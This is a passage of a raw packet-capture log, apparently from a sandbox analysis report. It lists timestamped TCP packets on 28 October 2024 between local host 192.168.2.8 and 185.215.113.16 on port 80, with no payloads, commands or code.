                                                                                                    Oct 28, 2024 07:18:43.898885012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.898896933 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.898909092 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.898922920 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899133921 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899147034 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899148941 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.899148941 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.899158955 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899282932 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.899552107 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899564028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899641991 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.899682999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899697065 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899708033 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.899755955 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.899755955 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.976421118 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976438046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976449966 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976527929 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976541042 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976552963 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976671934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.976671934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.976809978 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.976964951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976977110 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.976989031 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977056026 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.977305889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977319002 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977332115 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977346897 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977370977 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.977400064 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:43.977905035 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977916002 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:43.977957010 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.017951965 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018014908 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018028021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018029928 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.018040895 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018054008 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018229961 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.018229961 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.018532038 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018544912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018556118 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018609047 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.018615961 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018630028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018655062 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018666983 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.018673897 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.018731117 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.019193888 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.019212008 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.019248009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.070923090 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.095797062 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.095808983 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.095818996 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.095885038 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.096060038 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096071959 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096081972 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096129894 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.096160889 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.096297026 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096487999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096498966 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096508980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096519947 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.096570969 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.096570969 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.097157001 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.097167969 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.097179890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.097223997 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.097224951 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.136909962 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.136940956 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.136953115 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.136962891 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137016058 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.137264967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137276888 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137285948 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137298107 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137316942 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.137316942 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.137430906 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.137773037 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137809992 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.137868881 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.138010979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.138022900 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.138034105 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.138046980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.138082981 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.138113022 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.138549089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.138565063 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.138654947 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.214653969 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214673996 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214685917 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214796066 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214881897 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.214881897 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.214904070 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214915037 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214925051 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214936018 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214948893 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.214956045 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.214996099 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.215715885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.215725899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.215785027 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.215868950 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.215899944 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.215910912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.215936899 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.215960026 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.256187916 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256202936 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256213903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256454945 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.256797075 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256808043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256809950 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256818056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256824970 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256831884 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256913900 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256927013 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.256938934 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.257021904 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.257021904 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.257021904 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.257540941 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.257560968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.257652998 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.297364950 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.297420025 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.297472000 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.297488928 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.297571898 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.297571898 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.333780050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.333820105 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.333832026 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.333867073 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.333893061 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.333931923 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.333954096 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.333973885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.333986998 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334022999 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.334398031 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334450006 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334460974 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334471941 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334496975 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.334496975 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.334970951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334981918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.334992886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.335040092 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.335040092 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.375341892 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.375395060 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.375406027 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.375463009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.375490904 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.375554085 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.375608921 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.375616074 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.375674009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.375988007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376032114 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376040936 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376058102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376069069 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376090050 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.376100063 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376111984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376123905 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.376149893 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.376149893 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.376203060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.416555882 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.416577101 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.416589022 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.416662931 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.452846050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452864885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452876091 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452884912 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.452908993 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452915907 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.452953100 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452965021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452976942 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452995062 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.452996969 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.453025103 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.453639984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.453686953 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.453720093 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.453753948 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.453764915 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.453855038 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.454188108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.454216003 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.454250097 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.494323969 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494335890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494347095 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494457960 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494468927 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494501114 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.494501114 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.494530916 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.494687080 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494699001 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494715929 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.494765997 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.495179892 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495188951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495198965 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495245934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.495245934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.495256901 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495269060 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495280981 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495304108 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.495307922 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495322943 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.495357037 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.535742998 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.535793066 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.535801888 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.586477995 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864160061 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864181042 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864191055 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864202023 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864216089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864228964 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864244938 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864250898 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864257097 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864295006 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864306927 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864317894 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864330053 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864341021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864351988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864353895 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864353895 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864363909 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864376068 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864397049 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864397049 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864461899 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864463091 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864491940 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864502907 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864511967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864518881 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864522934 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864542007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864551067 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864552975 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864562988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864568949 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864574909 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864581108 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864593983 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864605904 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864617109 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864625931 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864628077 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864660978 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864662886 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864672899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864686012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864697933 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864710093 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864720106 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864798069 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864833117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864845991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864855051 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864870071 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864886045 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864896059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864909887 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864917040 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864923000 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864933968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864945889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864953995 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864953995 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864958048 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864970922 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864975929 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.864983082 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.864994049 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.865006924 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.865020037 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:44.865025997 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.865025997 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:44.865032911 CET8049717185.215.113.16192.168.2.8
